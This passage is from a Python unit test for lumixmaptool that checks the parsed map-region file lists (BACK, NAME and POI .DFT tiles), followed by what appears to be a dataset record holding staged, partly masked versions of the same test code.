"POI/P0000012.DFT",
"POI/P0000013.DFT",
"POI/P0000020.DFT",
"POI/P0000021.DFT",
"POI/P0000022.DFT",
"POI/P0000029.DFT",
"POI/P0000030.DFT",
"POI/P0000031.DFT",
],
6: [
"BACK/B0000040.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000049.DFT",
"BACK/B0000050.DFT",
"BACK/B0000051.DFT",
"NAME/N0000040.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000049.DFT",
"NAME/N0000050.DFT",
"NAME/N0000051.DFT",
"POI/P0000040.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000049.DFT",
"POI/P0000050.DFT",
"POI/P0000051.DFT",
],
7: [
"BACK/B0000032.DFT",
"BACK/B0000033.DFT",
"BACK/B0000034.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000043.DFT",
"BACK/B0000050.DFT",
"BACK/B0000051.DFT",
"BACK/B0000052.DFT",
"NAME/N0000032.DFT",
"NAME/N0000033.DFT",
"NAME/N0000034.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000043.DFT",
"NAME/N0000050.DFT",
"NAME/N0000051.DFT",
"NAME/N0000052.DFT",
"POI/P0000032.DFT",
"POI/P0000033.DFT",
"POI/P0000034.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000043.DFT",
"POI/P0000050.DFT",
"POI/P0000051.DFT",
"POI/P0000052.DFT",
],
8: [
"BACK/B0000031.DFT",
"BACK/B0000032.DFT",
"BACK/B0000033.DFT",
"BACK/B0000040.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000049.DFT",
"BACK/B0000050.DFT",
"BACK/B0000051.DFT",
"NAME/N0000031.DFT",
"NAME/N0000032.DFT",
"NAME/N0000033.DFT",
"NAME/N0000040.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000049.DFT",
"NAME/N0000050.DFT",
"NAME/N0000051.DFT",
"POI/P0000031.DFT",
"POI/P0000032.DFT",
"POI/P0000033.DFT",
"POI/P0000040.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000049.DFT",
"POI/P0000050.DFT",
"POI/P0000051.DFT",
],
9: [
"BACK/B0000005.DFT",
"BACK/B0000006.DFT",
"BACK/B0000007.DFT",
"BACK/B0000014.DFT",
"BACK/B0000015.DFT",
"BACK/B0000016.DFT",
"BACK/B0000023.DFT",
"BACK/B0000024.DFT",
"BACK/B0000025.DFT",
"BACK/B0000032.DFT",
"BACK/B0000033.DFT",
"BACK/B0000034.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000043.DFT",
"NAME/N0000005.DFT",
"NAME/N0000006.DFT",
"NAME/N0000007.DFT",
"NAME/N0000014.DFT",
"NAME/N0000015.DFT",
"NAME/N0000016.DFT",
"NAME/N0000023.DFT",
"NAME/N0000024.DFT",
"NAME/N0000025.DFT",
"NAME/N0000032.DFT",
"NAME/N0000033.DFT",
"NAME/N0000034.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000043.DFT",
"POI/P0000014.DFT",
"POI/P0000015.DFT",
"POI/P0000023.DFT",
"POI/P0000024.DFT",
"POI/P0000025.DFT",
"POI/P0000032.DFT",
"POI/P0000033.DFT",
"POI/P0000034.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000043.DFT",
],
10: [
"BACK/B0000037.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000043.DFT",
"BACK/B0000044.DFT",
"BACK/B0000045.DFT",
"BACK/B0000046.DFT",
"BACK/B0000050.DFT",
"BACK/B0000051.DFT",
"BACK/B0000052.DFT",
"BACK/B0000053.DFT",
"BACK/B0000054.DFT",
"NAME/N0000037.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000043.DFT",
"NAME/N0000044.DFT",
"NAME/N0000045.DFT",
"NAME/N0000046.DFT",
"NAME/N0000050.DFT",
"NAME/N0000051.DFT",
"NAME/N0000052.DFT",
"NAME/N0000053.DFT",
"NAME/N0000054.DFT",
"POI/P0000037.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000043.DFT",
"POI/P0000044.DFT",
"POI/P0000045.DFT",
"POI/P0000046.DFT",
"POI/P0000050.DFT",
"POI/P0000051.DFT",
"POI/P0000052.DFT",
"POI/P0000053.DFT",
"POI/P0000054.DFT",
],
},
}
nose.tools.assert_equal(result, expected)
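

# Sketch (an assumption, not part of the original test): the expected
# 'regions' mapping is highly regular -- each region repeats the same tile
# numbers once per BACK/, NAME/ and POI/ prefix -- so a small helper could
# build such fixtures compactly:
def region_files(tile_numbers):
    files = []
    for prefix, letter in (("BACK", "B"), ("NAME", "N"), ("POI", "P")):
        files += ["%s/%s%07d.DFT" % (prefix, letter, n) for n in tile_numbers]
    return files


# Region 1 above is exactly the expansion of tiles [35, 36, 44, 45, 53, 54]:
assert region_files([35, 36, 44, 45, 53, 54]) == [
    "BACK/B0000035.DFT", "BACK/B0000036.DFT", "BACK/B0000044.DFT",
    "BACK/B0000045.DFT", "BACK/B0000053.DFT", "BACK/B0000054.DFT",
    "NAME/N0000035.DFT", "NAME/N0000036.DFT", "NAME/N0000044.DFT",
    "NAME/N0000045.DFT", "NAME/N0000053.DFT", "NAME/N0000054.DFT",
    "POI/P0000035.DFT", "POI/P0000036.DFT", "POI/P0000044.DFT",
    "POI/P0000045.DFT", "POI/P0000053.DFT", "POI/P0000054.DFT",
]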
|
flexible
|
{
"blob_id": "4dfdbc692858a627248cbe47d19b43c2a27ec70e",
"index": 7373,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_mapdata_test():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, 'misc')\n maplistdata_path = os.path.join(misc_folder, 'MapList.dat')\n result = copy.parse_mapdata(maplistdata_path)\n expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',\n 'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',\n 'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [\n 'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',\n 'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',\n 'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',\n 'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',\n 'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [\n 'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',\n 'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',\n 'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',\n 'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',\n 'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',\n 'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',\n 'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',\n 'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',\n 'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',\n 'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',\n 'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',\n 'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',\n 'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',\n 'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',\n 'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',\n 'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',\n 'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',\n 'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',\n 'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',\n 'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',\n 'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 
'BACK/B0000031.DFT', 'NAME/N0000002.DFT',\n 'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',\n 'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',\n 'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',\n 'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',\n 'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [\n 'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [\n 'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',\n 'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',\n 'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',\n 'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',\n 'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',\n 'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',\n 'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 
'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',\n 'POI/P0000053.DFT', 'POI/P0000054.DFT']}}\n nose.tools.assert_equal(result, expected)\n",
"step-3": "<mask token>\n\n\ndef get_parser_test():\n \"\"\"Check if the evaluation model returns a parser object.\"\"\"\n copy.get_parser()\n\n\ndef parse_mapdata_test():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, 'misc')\n maplistdata_path = os.path.join(misc_folder, 'MapList.dat')\n result = copy.parse_mapdata(maplistdata_path)\n expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',\n 'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',\n 'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [\n 'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',\n 'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',\n 'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',\n 'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',\n 'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [\n 'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',\n 'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',\n 'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',\n 'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',\n 'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',\n 'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',\n 'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',\n 'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',\n 'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',\n 'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',\n 'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',\n 'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',\n 'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',\n 'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',\n 'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',\n 'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',\n 'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',\n 'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',\n 'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',\n 'BACK/B0000012.DFT', 
'BACK/B0000013.DFT', 'BACK/B0000020.DFT',\n 'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',\n 'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',\n 'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',\n 'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',\n 'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',\n 'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [\n 'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [\n 'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',\n 'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',\n 'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',\n 'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',\n 'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',\n 'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',\n 'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 
'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',\n 'POI/P0000053.DFT', 'POI/P0000054.DFT']}}\n nose.tools.assert_equal(result, expected)\n",
"step-4": "import os\nimport nose\nimport lumixmaptool.copy as copy\n\n\ndef get_parser_test():\n \"\"\"Check if the evaluation model returns a parser object.\"\"\"\n copy.get_parser()\n\n\ndef parse_mapdata_test():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, 'misc')\n maplistdata_path = os.path.join(misc_folder, 'MapList.dat')\n result = copy.parse_mapdata(maplistdata_path)\n expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',\n 'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',\n 'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [\n 'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',\n 'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',\n 'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',\n 'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',\n 'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [\n 'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',\n 'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',\n 'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',\n 'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',\n 'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',\n 'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',\n 'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',\n 'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',\n 'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',\n 'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 